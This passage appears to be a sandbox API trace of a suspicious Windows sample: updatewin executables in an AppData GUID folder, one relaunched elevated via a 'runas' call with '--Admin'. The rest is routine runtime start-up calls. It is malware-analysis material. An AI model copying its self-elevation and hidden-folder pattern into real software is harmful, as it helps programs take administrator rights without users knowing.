lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0181.201] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed388 | out: hHeap=0x5c0000) returned 1 [0181.201] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0181.201] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0181.201] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ea0d0 | out: hHeap=0x5c0000) returned 1 [0181.202] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ecab0 | out: hHeap=0x5c0000) returned 1 [0181.202] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0181.202] GetLastError () returned 0x57 [0181.202] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0181.202] ExitProcess (uExitCode=0x0) [0181.203] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ea9e8 | out: hHeap=0x5c0000) returned 1 [0181.206] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 84 os_tid = 0xaf8 Thread: id = 85 os_tid = 0xb70 Thread: id = 86 os_tid = 0xb7c Thread: id = 87 os_tid = 0xafc Process: id = "8" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe" page_root = "0x3ef23000" os_pid = "0xac0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xabc" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 82 os_tid = 0xad4 [0178.389] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9ddc9560, dwHighDateTime=0x1d60e72)) [0178.389] GetCurrentProcessId () returned 0xac0 [0178.389] GetCurrentThreadId () returned 0xad4 [0178.389] GetTickCount () returned 0x1156420 [0178.389] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=29839993516) returned 1 [0178.389] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0178.389] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x260000 [0178.395] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.395] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0178.395] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0178.395] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0178.395] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0178.396] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.396] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.398] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.398] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.398] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.399] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.399] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.399] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.399] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.399] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.400] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.400] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0178.400] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x214) returned 0x2607d0 [0178.400] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.400] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0178.401] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.401] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0178.401] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0178.401] GetCurrentThreadId () returned 0xad4 [0178.402] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0178.402] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x2609f0 [0178.402] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0178.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0178.402] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0178.402] SetHandleCount (uNumber=0x20) returned 0x20 [0178.402] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe\" " [0178.402] GetEnvironmentStringsW () returned 0x8a4e70* [0178.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0178.402] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x565) returned 0x2611f8 [0178.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2611f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0178.402] FreeEnvironmentStringsW (penv=0x8a4e70) returned 1 [0178.403] GetLastError () returned 0x0 [0178.403] SetLastError (dwErrCode=0x0) [0178.403] GetLastError () returned 0x0 [0178.403] SetLastError (dwErrCode=0x0) [0178.403] GetLastError () returned 0x0 [0178.403] SetLastError (dwErrCode=0x0) [0178.403] GetACP () returned 0x4e4 [0178.403] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x261768 [0178.403] GetLastError () returned 0x0 [0178.403] SetLastError (dwErrCode=0x0) [0178.403] IsValidCodePage (CodePage=0x4e4) returned 1 [0178.403] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0178.403] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0178.403] GetLastError () returned 0x0 [0178.403] SetLastError (dwErrCode=0x0) [0178.404] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0178.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0178.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0178.405] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0178.405] GetLastError () returned 0x0 [0178.405] SetLastError (dwErrCode=0x0) [0178.405] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0178.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0178.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ旿淴㞅AĀ") returned 256 [0178.405] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ旿淴㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0178.405] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ旿淴㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0178.405] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿä+\x9do\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0178.405] GetLastError () returned 0x0 [0178.405] SetLastError (dwErrCode=0x0) [0178.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0178.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ旿淴㞅AĀ") returned 256 [0178.405] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ旿淴㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0178.405] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ旿淴㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0178.405] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿä+\x9do\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0178.405] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe")) returned 0x5f [0178.406] GetLastError () returned 0x0 [0178.406] SetLastError (dwErrCode=0x0) [0178.406] GetLastError () returned 0x0 [0178.406] SetLastError (dwErrCode=0x0) [0178.406] GetLastError () returned 0x0 [0178.406] SetLastError (dwErrCode=0x0) [0178.406] GetLastError () returned 0x0 [0178.406] SetLastError (dwErrCode=0x0) [0178.406] GetLastError () returned 0x0 [0178.406] SetLastError (dwErrCode=0x0) [0178.406] GetLastError () returned 0x0 [0178.406] SetLastError (dwErrCode=0x0) [0178.406] GetLastError () returned 0x0 [0178.406] SetLastError (dwErrCode=0x0) [0178.406] GetLastError () returned 0x0 [0178.406] SetLastError (dwErrCode=0x0) [0178.406] GetLastError () returned 0x0 [0178.407] SetLastError (dwErrCode=0x0) [0178.407] GetLastError () returned 0x0 [0178.407] SetLastError (dwErrCode=0x0) [0178.407] GetLastError () returned 0x0 [0178.407] SetLastError (dwErrCode=0x0) [0178.407] GetLastError () returned 0x0 [0178.407] SetLastError (dwErrCode=0x0) [0178.407] GetLastError () returned 0x0 [0178.407] SetLastError (dwErrCode=0x0) [0178.407] GetLastError () returned 0x0 [0178.407] SetLastError (dwErrCode=0x0) [0178.407] GetLastError () returned 0x0 [0178.407] SetLastError (dwErrCode=0x0) [0178.407] GetLastError () returned 0x0 [0178.407] SetLastError (dwErrCode=0x0) [0178.407] GetLastError () returned 0x0 [0178.408] SetLastError (dwErrCode=0x0) [0178.408] GetLastError () returned 0x0 [0178.408] SetLastError (dwErrCode=0x0) [0178.408] GetLastError () returned 0x0 [0178.408] SetLastError (dwErrCode=0x0) [0178.408] GetLastError () returned 0x0 [0178.408] SetLastError (dwErrCode=0x0) [0178.408] GetLastError () 